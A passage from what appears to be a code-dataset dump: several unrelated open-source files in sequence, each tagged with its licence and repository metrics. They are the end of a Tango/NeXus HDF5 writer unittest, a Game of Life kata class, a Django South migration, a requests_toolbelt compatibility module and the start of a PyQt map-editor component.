self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "nexdatas_strategy")
self.assertEqual(at[...], "STEP")
at = cnt.attributes["type"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "type")
self.assertEqual(at[...], "NX_FLOAT")
at = cnt.attributes["units"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "units")
self.assertEqual(at[...], "m")
at = cnt.attributes["nexdatas_source"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
mca = det.open("image")
self.assertTrue(mca.is_valid)
self.assertEqual(mca.name, "image")
self.assertTrue(hasattr(cnt.shape, "__iter__"))
self.assertEqual(len(mca.shape), 3)
self.assertEqual(mca.shape, (4, 100, 200))
self.assertEqual(mca.dtype, "int64")
self.assertEqual(mca.size, 80000)
value = mca.read()
for i in range(len(value[0])):
for j in range(len(value[0][0])):
self.assertEqual(self._image1a[i][j], value[0][i][j])
for i in range(len(value[0])):
for j in range(len(value[0][0])):
self.assertEqual(self._image2a[i][j], value[1][i][j])
for i in range(len(value[0])):
for j in range(len(value[0][0])):
self.assertEqual(self._image2a[i][j], value[2][i][j])
for i in range(len(value[0])):
for j in range(len(value[0][0])):
self.assertEqual(self._image1a[i][j], value[3][i][j])
self.assertEqual(len(mca.attributes), 4)
at = cnt.attributes["nexdatas_strategy"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "nexdatas_strategy")
self.assertEqual(at[...], "STEP")
at = mca.attributes["type"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "type")
self.assertEqual(at[...], "NX_INT64")
at = mca.attributes["units"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "units")
self.assertEqual(at[...], "")
at = mca.attributes["nexdatas_source"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
dt = en.open("data")
self.assertTrue(dt.is_valid)
self.assertEqual(dt.name, "data")
self.assertEqual(len(dt.attributes), 1)
self.assertEqual(dt.size, 2)
at = dt.attributes["NX_class"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "NX_class")
self.assertEqual(at[...], "NXdata")
cnt = dt.open("cnt1")
self.assertTrue(cnt.is_valid)
self.assertEqual(cnt.name, "cnt1")
# self.assertEqual(cnt.name,"counter1")
self.assertTrue(hasattr(cnt.shape, "__iter__"))
self.assertEqual(len(cnt.shape), 1)
self.assertEqual(cnt.shape, (4,))
self.assertEqual(cnt.dtype, "float64")
self.assertEqual(cnt.size, 4)
# print(cnt.read())
value = cnt[:]
for i in range(len(value)):
self.assertEqual(
self._counter[i if i < 2 else 3 - i], value[i])
self.assertEqual(len(cnt.attributes), 4)
at = cnt.attributes["nexdatas_strategy"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "nexdatas_strategy")
self.assertEqual(at[...], "STEP")
at = cnt.attributes["type"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "type")
self.assertEqual(at[...], "NX_FLOAT")
at = cnt.attributes["units"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "units")
self.assertEqual(at[...], "m")
at = cnt.attributes["nexdatas_source"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
mca = dt.open("data")
self.assertTrue(mca.is_valid)
self.assertEqual(mca.name, "data")
self.assertTrue(hasattr(cnt.shape, "__iter__"))
self.assertEqual(len(mca.shape), 3)
self.assertEqual(mca.shape, (4, 100, 200))
self.assertEqual(mca.dtype, "int64")
self.assertEqual(mca.size, 80000)
value = mca.read()
for i in range(len(value[0])):
for j in range(len(value[0][0])):
self.assertEqual(self._image1a[i][j], value[0][i][j])
for i in range(len(value[0])):
for j in range(len(value[0][0])):
self.assertEqual(self._image2a[i][j], value[1][i][j])
for i in range(len(value[0])):
for j in range(len(value[0][0])):
self.assertEqual(self._image2a[i][j], value[2][i][j])
for i in range(len(value[0])):
for j in range(len(value[0][0])):
self.assertEqual(self._image1a[i][j], value[3][i][j])
self.assertEqual(len(mca.attributes), 4)
at = cnt.attributes["nexdatas_strategy"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "nexdatas_strategy")
self.assertEqual(at[...], "STEP")
at = mca.attributes["type"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "type")
self.assertEqual(at[...], "NX_INT64")
at = mca.attributes["units"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "units")
self.assertEqual(at[...], "")
at = mca.attributes["nexdatas_source"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
f.close()
finally:
if os.path.isfile(fname):
os.remove(fname)
# scanRecord test
# \brief It tests recording of simple h5 file
def test_scanRecordGrow4(self):
fun = sys._getframe().f_code.co_name
print("Run: %s.%s() " % (self.__class__.__name__, fun))
fname = "scantestgrow.h5"
try:
dp = PyTango.DeviceProxy(self._sv.device)
self.assertTrue(ProxyHelper.wait(dp, 10000))
# print 'attributes', dp.attribute_list_query()
dp.FileName = fname
self.setProp(dp, "writer", "h5cpp")
dp.FileName = fname
self.assertEqual(dp.state(), PyTango.DevState.ON)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.OpenFile()
self.assertEqual(dp.state(), PyTango.DevState.OPEN)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.XMLSettings = self._scanXml3 % fname
self.assertEqual(dp.state(), PyTango.DevState.OPEN)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.OpenEntry()
self.assertEqual(dp.state(), PyTango.DevState.EXTRACT)
self.assertEqual(dp.status(), self.__status[dp.state()])
cntg = [self._counter[0], self._counter[1]]
imageg = [self._image1, self._image2]
rec = {"data": {"exp_c01": cntg, "image": imageg}}
dp.Record(json.dumps(rec))
self.assertEqual(dp.state(), PyTango.DevState.EXTRACT)
self.assertEqual(dp.status(), self.__status[dp.state()])
cntg = [self._counter[1], self._counter[0]]
imageg = [self._image2, self._image1]
rec = {"data": {"exp_c01": cntg, "image": imageg}}
dp.Record(json.dumps(rec))
dp.CloseEntry()
self.assertEqual(dp.state(), PyTango.DevState.OPEN)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.CloseFile()
self.assertEqual(dp.state(), PyTango.DevState.ON)
self.assertEqual(dp.status(), self.__status[dp.state()])
# check the created file
f = H5CppWriter.open_file(fname, readonly=True)
f = f.root()
self.assertEqual(5, len(f.attributes))
self.assertEqual(f.attributes["file_name"][...], fname)
self.assertTrue(f.attributes["NX_class"][...], "NXroot")
self.assertEqual(f.size, 2)
en = f.open("entry1")
self.assertTrue(en.is_valid)
self.assertEqual(en.name, "entry1")
self.assertEqual(len(en.attributes), 1)
self.assertEqual(en.size, 2)
at = en.attributes["NX_class"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "NX_class")
self.assertEqual(at[...], "NXentry")
# ins = f.open("entry1/instrument:NXinstrument") #bad exception
# ins = f.open("entry1/instrument")
ins = en.open("instrument")
self.assertTrue(ins.is_valid)
self.assertEqual(ins.name, "instrument")
self.assertEqual(len(ins.attributes), 2)
self.assertEqual(ins.size, 1)
at = ins.attributes["NX_class"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "NX_class")
self.assertEqual(at[...], "NXinstrument")
at = ins.attributes["short_name"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "short_name")
self.assertEqual(at[...], "scan instrument")
det = ins.open("detector")
self.assertTrue(det.is_valid)
self.assertEqual(det.name, "detector")
self.assertEqual(len(det.attributes), 1)
self.assertEqual(det.size, 2)
at = det.attributes["NX_class"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "NX_class")
self.assertEqual(at[...], "NXdetector")
# cnt = det.open("counter") # bad exception
cnt = det.open("counter1")
self.assertTrue(cnt.is_valid)
self.assertEqual(cnt.name, "counter1")
self.assertTrue(hasattr(cnt.shape, "__iter__"))
self.assertEqual(len(cnt.shape), 1)
self.assertEqual(cnt.shape, (4,))
self.assertEqual(cnt.dtype, "float64")
self.assertEqual(cnt.size, 4)
value = cnt.read()
# value = cnt[:]
for i in range(len(value)):
self.assertEqual(
self._counter[i if i < 2 else 3 - i], value[i])
self.assertEqual(len(cnt.attributes), 4)
at = cnt.attributes["nexdatas_strategy"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "nexdatas_strategy")
self.assertEqual(at[...], "STEP")
at = cnt.attributes["type"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "type")
self.assertEqual(at[...], "NX_FLOAT")
at = cnt.attributes["units"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "units")
self.assertEqual(at[...], "m")
at = cnt.attributes["nexdatas_source"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
mca = det.open("image")
self.assertTrue(mca.is_valid)
self.assertEqual(mca.name, "image")
self.assertTrue(hasattr(cnt.shape, "__iter__"))
self.assertEqual(len(mca.shape), 3)
self.assertEqual(mca.shape, (4, 200, 200))
self.assertEqual(mca.dtype, "int64")
self.assertEqual(mca.size, 160000)
value = mca.read()
for i in range(len(value[0])):
for j in range(len(value[0][0])):
self.assertEqual(0, value[0][i][j])
for i in range(len(value[0])):
for j in range(len(value[0][0])):
self.assertEqual(9223372036854775807, value[1][i][j])
for i in range(len(value[0])):
for j in range(len(value[0][0])):
self.assertEqual(0, value[2][i][j])
for i in range(len(value[0])):
for j in range(len(value[0][0])):
self.assertEqual(9223372036854775807, value[3][i][j])
self.assertEqual(len(mca.attributes), 6)
at = cnt.attributes["nexdatas_strategy"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "nexdatas_strategy")
self.assertEqual(at[...], "STEP")
at = mca.attributes["type"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "type")
self.assertEqual(at[...], "NX_INT64")
at = mca.attributes["units"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "units")
self.assertEqual(at[...], "")
at = mca.attributes["nexdatas_source"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
dt = en.open("data")
self.assertTrue(dt.is_valid)
self.assertEqual(dt.name, "data")
self.assertEqual(len(dt.attributes), 1)
self.assertEqual(dt.size, 2)
at = dt.attributes["NX_class"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "NX_class")
self.assertEqual(at[...], "NXdata")
cnt = dt.open("cnt1")
self.assertTrue(cnt.is_valid)
self.assertEqual(cnt.name, "cnt1")
# self.assertEqual(cnt.name,"counter1")
self.assertTrue(hasattr(cnt.shape, "__iter__"))
self.assertEqual(len(cnt.shape), 1)
self.assertEqual(cnt.shape, (4,))
self.assertEqual(cnt.dtype, "float64")
self.assertEqual(cnt.size, 4)
# print(cnt.read())
value = cnt[:]
for i in range(len(value)):
self.assertEqual(
self._counter[i if i < 2 else 3 - i], value[i])
self.assertEqual(len(cnt.attributes), 4)
at = cnt.attributes["nexdatas_strategy"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "nexdatas_strategy")
self.assertEqual(at[...], "STEP")
at = cnt.attributes["type"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "type")
self.assertEqual(at[...], "NX_FLOAT")
at = cnt.attributes["units"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "units")
self.assertEqual(at[...], "m")
at = cnt.attributes["nexdatas_source"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
mca = dt.open("data")
self.assertTrue(mca.is_valid)
self.assertEqual(mca.name, "data")
self.assertTrue(hasattr(cnt.shape, "__iter__"))
self.assertEqual(len(mca.shape), 3)
self.assertEqual(mca.shape, (4, 200, 200))
self.assertEqual(mca.dtype, "int64")
self.assertEqual(mca.size, 160000)
value = mca.read()
for i in range(len(value[0])):
for j in range(len(value[0][0])):
self.assertEqual(0, value[0][i][j])
for i in range(len(value[0])):
for j in range(len(value[0][0])):
self.assertEqual(9223372036854775807, value[1][i][j])
for i in range(len(value[0])):
for j in range(len(value[0][0])):
self.assertEqual(0, value[2][i][j])
for i in range(len(value[0])):
for j in range(len(value[0][0])):
self.assertEqual(9223372036854775807, value[3][i][j])
self.assertEqual(len(mca.attributes), 6)
at = cnt.attributes["nexdatas_strategy"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "nexdatas_strategy")
self.assertEqual(at[...], "STEP")
at = mca.attributes["type"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "type")
self.assertEqual(at[...], "NX_INT64")
at = mca.attributes["units"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "units")
self.assertEqual(at[...], "")
at = mca.attributes["nexdatas_source"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
f.close()
finally:
if os.path.isfile(fname):
os.remove(fname)
if __name__ == '__main__':
unittest.main()
| gpl-3.0 | -2,483,284,254,181,963,300 | 40.044458 | 79 | 0.535316 | false | 3.876787 | false | false | false |
hemmerling/codingdojo | src/game_of_life/python_coderetreat_berlin_2014-09/python_legacycrberlin02/gol02.py | 1 | 1049 | 2#-------------------------------------------------------------------------------
# Name: module1
# Purpose:
#
# Author: Administrator
#
# Created: 08/10/2011
# Copyright: (c) Administrator 2011
# Licence: <your licence>
#-------------------------------------------------------------------------------
#!/usr/bin/env python
class Gol02:
def __init__(self):
self.numberOfNeighbors = 0
self.isAlive = False
self.board = []
pass
def evolve(self):
return
def setAlive(self):
self.isAlive = True
def isLiving(self):
result = ( self.numberOfNeighbors == 3 ) or \
(self.isAlive and self.numberOfNeighbors == 2)
return result
def addNeigbors(self, numberOfNeighbors):
self.numberOfNeighbors = numberOfNeighbors
return
def appendNeigbors(neighbor):
self.board.append(neighbor)
self.numberOfNeighbors +=1
if __name__ == '__main__':
pass | apache-2.0 | 3,356,558,385,341,113,300 | 24.275 | 81 | 0.467112 | false | 4.444915 | false | false | false |
ojii/gitstats.ep.io | src/stats/migrations/0001_initial.py | 1 | 1658 | # encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'Repository'
db.create_table('stats_repository', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('name', self.gf('django.db.models.fields.CharField')(unique=True, max_length=50)),
('slug', self.gf('django.db.models.fields.SlugField')(unique=True, max_length=50, db_index=True)),
('repourl', self.gf('django.db.models.fields.CharField')(unique=True, max_length=255)),
('updated', self.gf('django.db.models.fields.DateTimeField')(auto_now=True, blank=True)),
))
db.send_create_signal('stats', ['Repository'])
def backwards(self, orm):
# Deleting model 'Repository'
db.delete_table('stats_repository')
models = {
'stats.repository': {
'Meta': {'ordering': "['name']", 'object_name': 'Repository'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '50'}),
'repourl': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '50', 'db_index': 'True'}),
'updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
}
}
complete_apps = ['stats']
| bsd-3-clause | -6,306,751,295,875,368,000 | 41.512821 | 122 | 0.583836 | false | 3.725843 | false | false | false |
search5/nanumlectures | lib/requests_toolbelt/_compat.py | 17 | 9464 | """Private module full of compatibility hacks.
Primarily this is for downstream redistributions of requests that unvendor
urllib3 without providing a shim.
.. warning::
This module is private. If you use it, and something breaks, you were
warned
"""
from collections import Mapping, MutableMapping
import sys
import requests
try:
from requests.packages.urllib3 import fields
from requests.packages.urllib3 import filepost
from requests.packages.urllib3 import poolmanager
except ImportError:
from urllib3 import fields
from urllib3 import filepost
from urllib3 import poolmanager
try:
from requests.packages.urllib3.connection import HTTPConnection
from requests.packages.urllib3 import connection
except ImportError:
try:
from urllib3.connection import HTTPConnection
from urllib3 import connection
except ImportError:
HTTPConnection = None
connection = None
if requests.__build__ < 0x020300:
timeout = None
else:
try:
from requests.packages.urllib3.util import timeout
except ImportError:
from urllib3.util import timeout
if requests.__build__ < 0x021000:
gaecontrib = None
else:
try:
from requests.packages.urllib3.contrib import appengine as gaecontrib
except ImportError:
from urllib3.contrib import appengine as gaecontrib
PY3 = sys.version_info > (3, 0)
if PY3:
import queue
from urllib.parse import urlencode, urljoin
else:
import Queue as queue
from urllib import urlencode
from urlparse import urljoin
try:
basestring = basestring
except NameError:
basestring = (str, bytes)
class HTTPHeaderDict(MutableMapping):
"""
:param headers:
An iterable of field-value pairs. Must not contain multiple field names
when compared case-insensitively.
:param kwargs:
Additional field-value pairs to pass in to ``dict.update``.
A ``dict`` like container for storing HTTP Headers.
Field names are stored and compared case-insensitively in compliance with
RFC 7230. Iteration provides the first case-sensitive key seen for each
case-insensitive pair.
Using ``__setitem__`` syntax overwrites fields that compare equal
case-insensitively in order to maintain ``dict``'s api. For fields that
compare equal, instead create a new ``HTTPHeaderDict`` and use ``.add``
in a loop.
If multiple fields that are equal case-insensitively are passed to the
constructor or ``.update``, the behavior is undefined and some will be
lost.
>>> headers = HTTPHeaderDict()
>>> headers.add('Set-Cookie', 'foo=bar')
>>> headers.add('set-cookie', 'baz=quxx')
>>> headers['content-length'] = '7'
>>> headers['SET-cookie']
'foo=bar, baz=quxx'
>>> headers['Content-Length']
'7'
"""
def __init__(self, headers=None, **kwargs):
super(HTTPHeaderDict, self).__init__()
self._container = {}
if headers is not None:
if isinstance(headers, HTTPHeaderDict):
self._copy_from(headers)
else:
self.extend(headers)
if kwargs:
self.extend(kwargs)
def __setitem__(self, key, val):
self._container[key.lower()] = (key, val)
return self._container[key.lower()]
def __getitem__(self, key):
val = self._container[key.lower()]
return ', '.join(val[1:])
def __delitem__(self, key):
del self._container[key.lower()]
def __contains__(self, key):
return key.lower() in self._container
def __eq__(self, other):
if not isinstance(other, Mapping) and not hasattr(other, 'keys'):
return False
if not isinstance(other, type(self)):
other = type(self)(other)
return (dict((k.lower(), v) for k, v in self.itermerged()) ==
dict((k.lower(), v) for k, v in other.itermerged()))
def __ne__(self, other):
return not self.__eq__(other)
if not PY3: # Python 2
iterkeys = MutableMapping.iterkeys
itervalues = MutableMapping.itervalues
__marker = object()
def __len__(self):
return len(self._container)
def __iter__(self):
# Only provide the originally cased names
for vals in self._container.values():
yield vals[0]
def pop(self, key, default=__marker):
"""D.pop(k[,d]) -> v, remove specified key and return its value.
If key is not found, d is returned if given, otherwise KeyError is
raised.
"""
# Using the MutableMapping function directly fails due to the private
# marker.
# Using ordinary dict.pop would expose the internal structures.
# So let's reinvent the wheel.
try:
value = self[key]
except KeyError:
if default is self.__marker:
raise
return default
else:
del self[key]
return value
def discard(self, key):
try:
del self[key]
except KeyError:
pass
def add(self, key, val):
"""Adds a (name, value) pair, doesn't overwrite the value if it already
exists.
>>> headers = HTTPHeaderDict(foo='bar')
>>> headers.add('Foo', 'baz')
>>> headers['foo']
'bar, baz'
"""
key_lower = key.lower()
new_vals = key, val
# Keep the common case aka no item present as fast as possible
vals = self._container.setdefault(key_lower, new_vals)
if new_vals is not vals:
# new_vals was not inserted, as there was a previous one
if isinstance(vals, list):
# If already several items got inserted, we have a list
vals.append(val)
else:
# vals should be a tuple then, i.e. only one item so far
# Need to convert the tuple to list for further extension
self._container[key_lower] = [vals[0], vals[1], val]
def extend(self, *args, **kwargs):
"""Generic import function for any type of header-like object.
Adapted version of MutableMapping.update in order to insert items
with self.add instead of self.__setitem__
"""
if len(args) > 1:
raise TypeError("extend() takes at most 1 positional "
"arguments ({} given)".format(len(args)))
other = args[0] if len(args) >= 1 else ()
if isinstance(other, HTTPHeaderDict):
for key, val in other.iteritems():
self.add(key, val)
elif isinstance(other, Mapping):
for key in other:
self.add(key, other[key])
elif hasattr(other, "keys"):
for key in other.keys():
self.add(key, other[key])
else:
for key, value in other:
self.add(key, value)
for key, value in kwargs.items():
self.add(key, value)
def getlist(self, key):
"""Returns a list of all the values for the named field. Returns an
empty list if the key doesn't exist."""
try:
vals = self._container[key.lower()]
except KeyError:
return []
else:
if isinstance(vals, tuple):
return [vals[1]]
else:
return vals[1:]
# Backwards compatibility for httplib
getheaders = getlist
getallmatchingheaders = getlist
iget = getlist
def __repr__(self):
return "%s(%s)" % (type(self).__name__, dict(self.itermerged()))
def _copy_from(self, other):
for key in other:
val = other.getlist(key)
if isinstance(val, list):
# Don't need to convert tuples
val = list(val)
self._container[key.lower()] = [key] + val
def copy(self):
clone = type(self)()
clone._copy_from(self)
return clone
def iteritems(self):
"""Iterate over all header lines, including duplicate ones."""
for key in self:
vals = self._container[key.lower()]
for val in vals[1:]:
yield vals[0], val
def itermerged(self):
"""Iterate over all headers, merging duplicate ones together."""
for key in self:
val = self._container[key.lower()]
yield val[0], ', '.join(val[1:])
def items(self):
return list(self.iteritems())
@classmethod
def from_httplib(cls, message): # Python 2
"""Read headers from a Python 2 httplib message object."""
# python2.7 does not expose a proper API for exporting multiheaders
# efficiently. This function re-reads raw lines from the message
# object and extracts the multiheaders properly.
headers = []
for line in message.headers:
if line.startswith((' ', '\t')):
key, value = headers[-1]
headers[-1] = (key, value + '\r\n' + line.rstrip())
continue
key, value = line.split(':', 1)
headers.append((key, value.strip()))
return cls(headers)
__all__ = (
'basestring',
'connection',
'fields',
'filepost',
'poolmanager',
'timeout',
'HTTPHeaderDict',
'queue',
'urlencode',
'gaecontrib',
'urljoin',
)
| apache-2.0 | -1,728,486,609,376,456,400 | 29.529032 | 79 | 0.588123 | false | 4.325411 | false | false | false |
Karkus476/flexlay | flexlay/gui/editor_map_component.py | 1 | 7602 | # Flexlay - A Generic 2D Game Editor
# Copyright (C) 2014 Ingo Ruhnke <[email protected]>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import pickle
from PyQt4.QtCore import Qt
from PyQt4.QtGui import (QWidget, QGridLayout, QScrollBar, QTabWidget,
QKeySequence, QShortcut, QCursor)
from flexlay.graphic_context_state import GraphicContextState
from flexlay.math import Pointf
from flexlay.util import Signal
from flexlay.workspace import Workspace
from .editor_map_widget import EditorMapWidget
from .object_selector import ObjectSelector
class EditorMapComponent:
current = None
def __init__(self, tabbed=True, parent=None):
EditorMapComponent.current = self
self.workspace = Workspace()
self.gc_state = GraphicContextState()
if tabbed:
self.tab_widget = QTabWidget(parent)
self.widget = QWidget(self.tab_widget)
self.tab_widget.addTab(self.widget, "A Label")
else:
self.tab_widget = None
self.widget = QWidget(parent)
self.layout = QGridLayout(self.widget)
self.layout.setContentsMargins(0, 0, 0, 0)
self.layout.setHorizontalSpacing(0)
self.layout.setVerticalSpacing(0)
self.scroll_horz = QScrollBar(Qt.Horizontal)
self.scroll_vert = QScrollBar(Qt.Vertical)
self.editormap_widget = EditorMapWidget(self, None)
self.scroll_horz.valueChanged.connect(self.move_to_x)
self.scroll_vert.valueChanged.connect(self.move_to_y)
self.layout.addWidget(self.editormap_widget, 0, 0)
self.layout.addWidget(self.scroll_horz, 1, 0)
self.layout.addWidget(self.scroll_vert, 0, 1)
self.sig_drop = Signal()
self.editormap_widget.sig_drop.connect(self.on_drop)
def on_drop(self, data, pos):
"""sends (brush, pos)"""
brush_id = pickle.loads(data)
brush = ObjectSelector.current.get_brush(brush_id)
return self.sig_drop(brush, pos)
def get_workspace(self):
return self.workspace
def grab_mouse(self):
self.editormap_widget.grabMouse()
def release_mouse(self):
self.editormap_widget.releaseMouse()
# ifdef GRUMBEL
# void
# EditorMapComponentImpl::on_key_down(const CL_InputEvent& event)
# {
# if (event.id >= 0 && event.id < 256)
# {
# Rect rect = parent.get_position()
# key_bindings[event.id](CL_Mouse::get_x() - rect.left,
# CL_Mouse::get_y() - rect.top)
# }
# if (event.repeat_count == 0)
# {
# Rect rect = parent.get_position()
# CL_InputEvent ev2 = event
# ev2.mouse_pos = Point(CL_Mouse::get_x() - rect.left,
# CL_Mouse::get_y() - rect.top)
# workspace.key_down(InputEvent(ev2))
# }
# }
# void
# EditorMapComponentImpl::on_key_up(const CL_InputEvent& event)
# {
